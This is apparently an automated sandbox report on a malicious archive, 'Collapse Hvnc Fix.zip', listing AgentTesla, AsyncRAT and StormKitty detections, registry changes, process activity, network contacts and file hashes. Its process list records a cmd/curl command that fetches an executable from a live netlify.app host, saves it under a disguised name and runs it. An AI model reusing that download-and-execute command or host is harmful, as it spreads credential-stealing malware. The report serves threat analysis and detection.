Analysis Overview
SHA256
d3627b91410ec6ecfab993fb446ecabe7a77186707fb3e454a956a9cc1bad087
Threat Level: Known bad
The file Collapse Hvnc Fix.zip was found to be: Known bad.
Malicious Activity Summary
Agenttesla family
AsyncRat
Async RAT payload
StormKitty payload
Stormkitty family
AgentTesla
Asyncrat family
AgentTesla payload
Executes dropped EXE
Checks computer location settings
Unsigned PE
Enumerates physical storage devices
Modifies Internet Explorer settings
Enumerates system info in registry
Modifies registry class
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-09-23 15:25
Signatures
AgentTesla payload
Agenttesla family
Async RAT payload
Asyncrat family
StormKitty payload
Stormkitty family
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2023-09-23 15:24
Reported
2023-09-23 15:43
Platform
win10v2004-20230915-en
Max time kernel
150s
Max time network
157s
Command Line
Signatures
AgentTesla
AsyncRat
AgentTesla payload
Async RAT payload
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Client.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\Client.exe | N/A |
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Software\Microsoft\Internet Explorer\TypedURLs | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "5" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Generic" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\0 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\0\0 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe110000007b7dda1e9be7d901c0393f219be7d9018e5da6239be7d90114000000 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Desktop\Client.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1152 wrote to memory of 936 | N/A | C:\Users\Admin\Desktop\Client.exe | C:\Windows\System32\cmd.exe |
| PID 1152 wrote to memory of 936 | N/A | C:\Users\Admin\Desktop\Client.exe | C:\Windows\System32\cmd.exe |
| PID 936 wrote to memory of 3984 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\curl.exe |
| PID 936 wrote to memory of 3984 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\curl.exe |
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix.zip"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\" -spe -an -ai#7zMap28299:114:7zEvent17349
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe
"C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe"
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Users\Admin\Desktop\Client.exe
"C:\Users\Admin\Desktop\Client.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl -L --silent https://beautiful-genie-43cd26.netlify.app/assets/files/installer/ds.exe > "%TEMP%\aspnet_compiler.exe" & start /min "" "%TEMP%\aspnet_compiler.exe"
C:\Windows\system32\curl.exe
curl -L --silent https://beautiful-genie-43cd26.netlify.app/assets/files/installer/ds.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 108.211.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.208.79.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | keyauth.win | udp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | 57.72.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beautiful-genie-43cd26.netlify.app | udp |
| US | 44.217.161.11:443 | beautiful-genie-43cd26.netlify.app | tcp |
| US | 8.8.8.8:53 | 11.161.217.44.in-addr.arpa | udp |
| N/A | 127.0.0.1:5552 | N/A | tcp |
| N/A | 127.0.0.1:5552 | N/A | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe
| MD5 | a2254ef4b20b21a3e1dcb7318217cadf |
| SHA1 | 8fb7e8e489f34968bf3bb26857208f392911b6d6 |
| SHA256 | 3c2caf7af685cb69b81d9469afbbbb397ca4480f61c7363ea711c5a11781ed18 |
| SHA512 | bd6bf9d3fc86c830eb10f2456b15f8d4c3d3da154b8b9c80eed22e30275310b0820136e96cc2fe0e06a0f57be8a5dc1ec85fd7fd0d64b62de4bee3f4697b3ef0 |
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe.config
| MD5 | b8b7f83b3291d497e37b8117a59facf1 |
| SHA1 | 677353bfafdcb73f194826f99b1450aa343ed40f |
| SHA256 | a3ff6fdc656bb0a36df5e3da671cc649dc57a38cd8b9b0063c547bfd58b0c650 |
| SHA512 | 87176764801f63b6102d0981f2e08b5f5cd5ba3c030196a25293cc9ee681acc8175adc6880248f579b91e28f503e6a237e94bd2c0cbef5d3ca44f692dddf7427 |
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Siticone.Desktop.UI.dll
| MD5 | 1582aa45d981e0e569c6e05698642b30 |
| SHA1 | 763506f312a186c55a04ef6a16ad7e867c394097 |
| SHA256 | 21eecaf504b7fe787a45f4aa8f8f36dacfc3ab1d75624dfb41827cdef2a9a589 |
| SHA512 | 278a7a4e2b9d82528200b9f92244db3f228187d15c36fd169deb927e343bc4d0bb29c9dba496f86558aea4f4deb44d1e47a41d5598c0b375d99ad9fbe99cec34 |
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Guna.UI2.dll
| MD5 | 1915011997fdb9aa95f15e567f4e6070 |
| SHA1 | 40a7853f14d6d4919279965f026d57cf9a104998 |
| SHA256 | 952fa59d3d6d8c8c5fad8a1144e5effdf0fa92d58db1fb2a2899faf84c6273ab |
| SHA512 | 5cca71b42ed9dc154e6d5919e7cd93046168781a55c051818157848efc918b2e4dd92f422eb1c47e0940b645ba750facf83bce240748a8170ac8ce0afc9efa90 |
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\cGeoIp.dll
| MD5 | 6d6e172e7965d1250a4a6f8a0513aa9f |
| SHA1 | b0fd4f64e837f48682874251c93258ee2cbcad2b |
| SHA256 | d1ddd15e9c727a5ecf78d3918c17aee0512f5b181ad44952686beb89146e6bd0 |
| SHA512 | 35daa38ad009599145aa241102bcd1f69b4caa55ebc5bb11df0a06567056c0ec5fcd02a33576c54c670755a6384e0229fd2f96622f12304dec58f79e1e834155 |
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\ServerCertificate.p12
| MD5 | 6ce85262afbc028314bdf6fe9aa718a5 |
| SHA1 | b59fe71c2ebd80df9e3ba5681ff6e36c90c2f0a8 |
| SHA256 | 74eba079b36c835cd89af395cf53272c53351cd851efb140a8152410c4e2973e |
| SHA512 | 8ac1198de48c3acab03482958ccd5044561599373338f0bb9ff203c0d596b810143d420ebdcb20abd60a1383a08e70f7ddac6fa9b304a0a3a61aa06af030e6fb |
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\dnlib.dll
| MD5 | 5cc2bb48b5e8c8ac0b99669401d15456 |
| SHA1 | 02e9ae08f3ec364834eb3ffc122f1c90e1b0e95e |
| SHA256 | 648950f725fb0320e09c52dcaf81764916df96dc62e7429ba67daea0acb784ea |
| SHA512 | 2867e94cee9f89f1cf85ad01083d75f4bc0bc0e551b2ffae05581828994f2b01a458ac7a7c94a45e8c40858ecce197f7ec23482ee13ef3f1bf82b33b89b3b420 |
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Stub\Client.exe
| MD5 | f5c75c1d8cdb213c46d6cb1e50178ac2 |
| SHA1 | 7a60f6aca8b06c46518d26ae9f7c321f312816a7 |
| SHA256 | ff1593d664038b0c727f5a4772980f3dee659d315bbbf1b62b27c12696b42109 |
| SHA512 | 0d602f4e9fbda3c9e219cf507917bae9527581d8d341d20523b3dcc756d9b2244485937bac793a16489fec4d22a618249009a515ed63ad1e25fd87308fbf3698 |
C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Keylogger.exe
| MD5 | b8607b7921cd9cba78058fcb56bcfb9d |
| SHA1 | 1344f12ff7e23122b62fcc7f3be548c73d3c3efd |
| SHA256 | b2a992052d32a5b9d3702350b133289b45a8d209acd0161d9c3b0bc6fd702b3c |
